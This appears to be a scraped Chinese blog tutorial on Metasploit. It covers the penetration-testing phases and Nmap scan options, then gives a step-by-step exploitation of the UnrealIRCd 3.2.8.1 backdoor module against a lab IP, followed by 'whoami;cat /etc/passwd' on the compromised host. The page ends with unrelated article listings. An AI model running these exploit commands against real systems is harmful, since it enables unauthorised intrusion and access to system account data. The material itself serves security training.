Metasploit 进阶第一讲    攻击流程及命令介绍

 

01.渗透测试过程环节(PTES

 

1.前期交互阶段:与客户组织进行交互讨论,确定范围,目标等

2.情报搜集阶段:获取更多目标组织信息,NmapNessus

3.威胁建模阶段:理清头绪,确定出最可行的攻击通道

4.漏洞分析阶段:搜索可获取的渗透代码资源

5.渗透攻击阶段:找出安全漏洞,入侵系统

6.后渗透攻击阶段:你想干什么,Mctcrprctcr

7.报告阶段:渗透测试报告

 

 

 

02. Metasploit漏洞利用环节

 

情报搜集阶段

 

外围信息搜索   -    Google Hacking等

主机探测与端口扫描          -Nmap等

服务扫描       -auxiliary/scanner/tclnet/…等(见目录)

网络漏洞扫描   -OpenVAS、Nessus等

 

情报搜集阶段—Nmap

格式:nmap<扫描选项,<扫描目标>

·扫描选项:指定扫描方式      ·扫描目标:

-sn         -探测存活主机,不扫描端口                         单个p地址

-o                  -目标操作系统识别                                          多个p地址,用逗号分割(,)

-sV         -详细服务版本信息                                         连续ip地址,用连字符号(-)

-f                   -快速扫描                                                    CIDR表示,192.168.22.0/24

-sT/-sS/-sA                 -全连接/syn扫描/ack扫描,

同auxiliary/scanner/portscan/..模块

-sU                              -udp端口扫描了

-p<端口范围>           指定扫描端口

 

  

Nmap  –sV  -o  192.168.24.139

 

状态:

open 应用程序正在此端口监听

closed 主机响应,无应用程序监听

filtered 不确定是否开放

unfiltered 无法确定端口是否开放(仅出现在ack扫描时)

nmap  -A  -p  6667   192.168.24.139

 

情报搜集阶段--其他姿势

漏洞分析阶段

 

IRC:“Internet Rely Chat”的缩写,网络中继聊天,通过网络的即时交流工具。

IRC运作方式:是一种分布式的客户端/服务器的结构,一个IRC服务器内部包含多个IRC频道,这些频道和qq群类似。若频道不是保留频道且频道中无人,该频道就会消失,而想加入某个频道,若频道名不存在,则会创建这个频道,创建者为管理员,频道内部可私聊。

IRC端口:服务器端口:6667,客户端端口:6697,连接使用的是SSL。

 

1.msfconsole             -启动metasploit框架

2.search unreal ircd3.2.8.1     -在metasploit框架中查询相关模块

3.info exploit/unix/irc/unreal_ircd_3.2.8.1_backdoor  -查看模块信息,命名规则:模块类型/目标平台/目标服务/模块名称

4.cat/usr/share/metasploit-framework/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb         -查看源代码(也可在目录中查看)

渗透攻击阶段

1.use exploit/unix/irc/unreal_ircd_3281_backdoor             -使用该模块

2.show  options    -查看需配置的参数(Required为yes的选项必须配置)

3.set  rhosts  192.168.24.139     -配置目标ip地址

4.run/exploit   -运行该模块

5.whoami;cat/etc/passwd      -成功后查看目标主机信息

 

 

Metasploit漏洞利用流程总结

 

Metasploit命令:

1.     msfconsole

2.     search相关模块

3.     use模块路径

4.     show  options

5.set <参数名称> <参数信息

6.run/exploit

7..

 

 

3.Metasploit攻击流程及命令介绍的更多相关文章

  1. git各种命令介绍以及碰到的各种坑

    一.各种命令介绍: git pull:从其他的版本库(既可以是远程的也可以是本地的)将代码更新到本地,例如:'git pull origin master'就是将origin这个版本库的代码更新到本地 ...

  2. 5.Metasploit攻击载荷深入理解

    Metasploit 进阶第三讲 深入理解攻击载荷   01 Nesus介绍.安装及使用 Nessus介绍 Nessus是一款著名的漏洞扫描及分析工具,提供完整的漏洞扫描服务,并随时更新漏洞数据库. ...

  3. 12个Linux进程管理命令介绍(转)

    12个Linux进程管理命令介绍 [日期:2015-06-02] 来源:Linux中国  作者:Linux [字体:大 中 小]   执行中的程序在称作进程.当程序以可执行文件存放在存储中,并且运行的 ...

  4. 2.SDK目录结构和adb工具及命令介绍

    安卓开发学习笔记 1.安卓开发之环境搭建 2.SDK目录结构和adb工具及命令介绍 1.SDK目录介绍: ******************************** add-ons:Androi ...

  5. [推荐]DDOS攻击与防范知识介绍

    [推荐]DDOS攻击与防范知识介绍 DDOS攻防体系建设v0.2(淘宝-林晓曦)     http://wenku.baidu.com/view/39549a11a8114431b90dd866.ht ...

  6. tar.xz如何解压:linux和windows下tar.xz解压命令介绍

    在linux下怎么解压和压缩tar.xz文件? (本文由www.169it.com搜集整理) 在linux下解压tar.xz文件步骤 1 2 # xz -d ***.tar.xz  //先解压xz # ...

  7. 查看MySQL数据库表的命令介绍

    如果需要查看MySQL数据库中都有哪些MySQL数据库表,应该如何实现呢?下面就为您介绍查看MySQL数据库表的命令,供您参考. 进入MySQL Command line client下查看当前使用的 ...

  8. Docker学习总结之Run命令介绍

    Docker学习总结之Run命令介绍 本文由Vikings(http://www.cnblogs.com/vikings-blog/) 原创,转载请标明.谢谢! 在使用Docker时,执行最多的命令某 ...

  9. maven常用命令介绍

    mvn 3.0.4 创建maven项目命令  mvn  archetype:generate   -DgroupId=damocles-autocredit -DartifactId=damocles ...

随机推荐

  1. 读《Java并发编程的艺术》学习笔记(一)

    接下来一个系列,是关于<Java并发编程的艺术>这本书的读书笔记以及相关知识点,主要是为了方便日后多次复习和防止忘记.废话不多说,直接步入主题: 第1章  并发编程的挑战 并发编程的目的是 ...

  2. 2020年ubuntu sever1804 安装和配置

    最后一次折腾linux服务器,应该是13的我的VPS.因为转行后,没有及时关注vps续费的问题,结果过期,所有的数据丢失了 当时觉得,反正都不做了,丢了就丢了吧,可现在想起来,实在是太后悔了. 今天, ...

  3. asyncio在爬虫中的使用

    # -*- coding: utf-8 -*- # 协程基础.py import asyncio import time async def request(url): print("正在请 ...

  4. 深入理解JS引擎的执行机制

    深入理解JS引擎的执行机制 1.灵魂三问 : JS为什么是单线程的? 为什么需要异步? 单线程又是如何实现异步的呢? 2.JS中的event loop(1) 3.JS中的event loop(2) 4 ...

  5. mui switch 点击事件不冒泡

    工作上遇到一个问题 手机移动端app,采用mui框架,要求左边是手机号码,右边是switch开关,并且点击标题的时候,可以展开下面人员的基本信息. 采用了折叠面板. 先上图如下: 开始时出现的问题是: ...

  6. Python基础篇(一)_基本语法元素

    Python基础篇——基本语法元素 缩进:体现强制可读性,一般缩进4个空格.一个或多个Tab 注释:单行注释----以 # 开头 多行注释----每行以 # 开头,以 # 结束 变量:无须提前声明.可 ...

  7. Set-Get(?占位符)-Java(新手)

    创建实体类: package JdbcDome; public class EmpL { private int uid; private String uNAME; private int age; ...

  8. 再刷JVM-JVM运行时数据区域

    前言 Java虚拟机在执行Java程序的过程中会把它所管理的内存划分为若干个不同的数据区域.这些区域有各自的用途,以及创建和销毁的时机,有的区域随着虚拟机进程的启动而一直存在,有些区域则是依赖用户线程 ...

  9. Core3.1WebApi_ 同源策略_如何支持跨域(转载)

    原文:https://mp.weixin.qq.com/s/id3fOyGrZI9lLx7PKbVYlg

  10. Mol Cell Proteomics. | Integration and analysis of CPTAC proteomics data in the context of cancer genomics in the cBioPortal (解读人:徐洪凯)

    文献名:Integration and analysis of CPTAC proteomics data in the context of cancer genomics in the cBioP ...